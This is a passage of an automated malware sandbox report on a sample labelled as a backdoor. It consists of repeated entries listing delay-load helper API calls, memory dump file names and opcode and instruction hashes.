                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 46b1da2371aba0f4408797ab281e209c563af11f0f327878d4adba442d8afd87
                                                • Instruction ID: 8b1dc7213e95aea38f5ac37943e33b5fe9372afa9d8f98e20e8a6a0a343e27bc
                                                • Opcode Fuzzy Hash: 46b1da2371aba0f4408797ab281e209c563af11f0f327878d4adba442d8afd87
                                                • Instruction Fuzzy Hash: 12B012A136F042AC3158A14A6D16D3A020ED4C9B10730801ABA1DD02C0D448BC080431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: bb085084b6d58ed3f3bc8d68642782318ebec91eb3c64c739a8df62c034f1f04
                                                • Instruction ID: bdf586f66e9991cd4b2343a32e9a1668b9d199dbe07fbffd6e74f1a216f1d1a5
                                                • Opcode Fuzzy Hash: bb085084b6d58ed3f3bc8d68642782318ebec91eb3c64c739a8df62c034f1f04
                                                • Instruction Fuzzy Hash: B6B012A126E041AC315CB14B6D16E3E024CE0CCB10330C52BF529C0284D44C4D0D4471
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: ae32b700ef0c405b743935d2189831269698ec9dd46fc911ed20697389c1bacc
                                                • Instruction ID: 6d38bcbb9882cd10dba247c2aafd01df9e790f85f769606b24b3141af6fa79ac
                                                • Opcode Fuzzy Hash: ae32b700ef0c405b743935d2189831269698ec9dd46fc911ed20697389c1bacc
                                                • Instruction Fuzzy Hash: E1B012B126E041EC315CB1476C16D3A024CD0C8B10330C12BF829C0284D44C4E0C4871
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 1562eb87298add10838f2d6cec7d9a12aade925ea8e35ee9fa6540eb5167fa59
                                                • Instruction ID: c890c64032f13f502f52f2186748e7ca8082c705d45120966238c568bf4a73d4
                                                • Opcode Fuzzy Hash: 1562eb87298add10838f2d6cec7d9a12aade925ea8e35ee9fa6540eb5167fa59
                                                • Instruction Fuzzy Hash: 91B012A12AE141AC715CF1476D16E3A024CF0C8B10330812BF429C0284D54C4D0C4571
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 21e99585497217588c4d414fca0284bc9481d366de2091460f2e17859425c73b
                                                • Instruction ID: 260a3865ba837b19c1960c431994453461c328634f065841d05bc827d8027a75
                                                • Opcode Fuzzy Hash: 21e99585497217588c4d414fca0284bc9481d366de2091460f2e17859425c73b
                                                • Instruction Fuzzy Hash: 18B012E637E082AC315C9146AD1BE37025CE0C8B20330801AB219D02C0EA484C0D4031
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 239239b8c92ddb0628d9516b6c2bfae9b2e978422e928634fe6818feac2962d1
                                                • Instruction ID: e74a027455f35a0e01a80eb4d9dcac7cef1f7b6ee2af5b94ce6659fb44529248
                                                • Opcode Fuzzy Hash: 239239b8c92ddb0628d9516b6c2bfae9b2e978422e928634fe6818feac2962d1
                                                • Instruction Fuzzy Hash: F8B012E637E042EC315C9146AC1BE3702ACE0C8B20330801AB519D12C0EA484C0C4031
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: d1c0478d2b31b6fd9974e9ea5593c3fbc1c08ce1247842a0238a07f608b3c58a
                                                • Instruction ID: e80923f91f171207d189a7fe22f812ed2dc0c59f98c4d829c5eef61a99797ce7
                                                • Opcode Fuzzy Hash: d1c0478d2b31b6fd9974e9ea5593c3fbc1c08ce1247842a0238a07f608b3c58a
                                                • Instruction Fuzzy Hash: E6B012E637E041AC315C91566D1BF36021CF0C8B20330402AB12AD02C0EA484C0C4031
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 65c68a5d4bf5b772db154e30ff14631c3aee20edeb5ede257b7527e705758259
                                                • Instruction ID: 780ae93a044211ce8117293ffbbfaa60582b3987d464d7cea96e4623a3e94f1f
                                                • Opcode Fuzzy Hash: 65c68a5d4bf5b772db154e30ff14631c3aee20edeb5ede257b7527e705758259
                                                • Instruction Fuzzy Hash: F0B012E637E146BC325C5142BC1BD37021CE0C4B20330412AB115E01C0EA484C4C4031
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDC36
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: c9ed425d4fcfeefad04413c1e2e9ea5477e3c51a0fde3eb147d6328c5496eb29
                                                • Instruction ID: ebebe4f49e59c893060b97c822546ab193556a71d5f9fc5577e8160f590c268c
                                                • Opcode Fuzzy Hash: c9ed425d4fcfeefad04413c1e2e9ea5477e3c51a0fde3eb147d6328c5496eb29
                                                • Instruction Fuzzy Hash: 0BB012A527E241AC315CB14AAD06D3E022CE0C8B50330451BB219D12E0E588BC084031
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDC36
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 64f63658bb1a58012e32ffa7b203d7fa42fa3bb644487e592b9709f5e509c1e8
                                                • Instruction ID: a9e8def5ad15326a89c65ab925cb37bc70f9d23c8d1544d40b6a146eacf8b271
                                                • Opcode Fuzzy Hash: 64f63658bb1a58012e32ffa7b203d7fa42fa3bb644487e592b9709f5e509c1e8
                                                • Instruction Fuzzy Hash: 31B012A526E141AC315CB14AAD06D3E022CD0CCB50330851AB619D12E0E5887C084031
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDC36
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: e342e26f93175b614217d3be0b6bfb4ea11e89882c2d23f9391c95cfecdbccf3
                                                • Instruction ID: b57560ec9f52928f07703346908e0aa4519e46db5c68ae73da57fabcdc6020f4
                                                • Opcode Fuzzy Hash: e342e26f93175b614217d3be0b6bfb4ea11e89882c2d23f9391c95cfecdbccf3
                                                • Instruction Fuzzy Hash: 38B012A526E241BC315C7146BF06C3E022CD1C8B50330461AB215E01E0A5C87C485031
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 6d6f64c7ed9a590d9b3ba5c47f3d261178fc78b03bb7bb7e862f9bdb403b39e4
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: 6d6f64c7ed9a590d9b3ba5c47f3d261178fc78b03bb7bb7e862f9bdb403b39e4
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 4c39061c71380cdf304b90c55979c21561cf24e4c1f786ad2d3a2b7896d13983
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: 4c39061c71380cdf304b90c55979c21561cf24e4c1f786ad2d3a2b7896d13983
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 56f1383f3ffa79a30de972ac1897f3ee78d14344bc3cf408bfebe8d35965619d
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: 56f1383f3ffa79a30de972ac1897f3ee78d14344bc3cf408bfebe8d35965619d
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
